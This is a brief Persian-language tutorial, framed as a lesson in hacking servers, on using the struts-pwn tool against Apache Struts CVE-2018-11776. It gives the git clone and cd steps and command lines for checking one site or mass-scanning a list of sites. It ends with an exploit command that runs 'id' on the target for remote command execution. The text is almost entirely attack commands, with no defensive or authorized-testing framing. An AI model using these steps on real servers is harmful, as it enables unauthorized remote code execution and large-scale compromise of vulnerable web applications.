اموزش هک سرور با استفاده از روش اول
در ابتدا دقت داشته باشید در سیستمیکه میخواهید تست اکسپلویت را درانانجام دهید پایتون 2 یا 3 نصب باشد به دلیل نوشته شدن ابزار به زبان پایتون
ابزار را از بخش دانلود در اخر صفحه دانلود کنید برای دانلود بصورت پوشه در لینوکس خود از دستور زیر استفاده کنید :
git clone Link
سپس با دستور زیر وارد پوشه دانلود شده شوید که ابزار اصلی دراناست
cd struts-pwn_CVE-2018-11776
برای برسی سایت مورد نظر که ایا به این حفره امنیتی اسیب پذیر است مانند دستور زیر ادرس سایت را وارد کنید
python3 struts-pwn.py –url https://site.com/struts2-showcase/index.action
اگر میخواهید چندین وبسایت را بصورت هم زمان برسی کنید انها را در یک فایل ذخیره کنید و فایل خود را بصورت لیست به برنامه بدهید تا سکن شود
python3 struts-pwn.py –list list-site.txt
برای استفاده از این اسیب پذیری و دسترسی ریمود از دستور زیر استفاده شود
python3 struts-pwn.py –exploit –url ‘https://site.com/struts2-showcase/index.action’ -c id
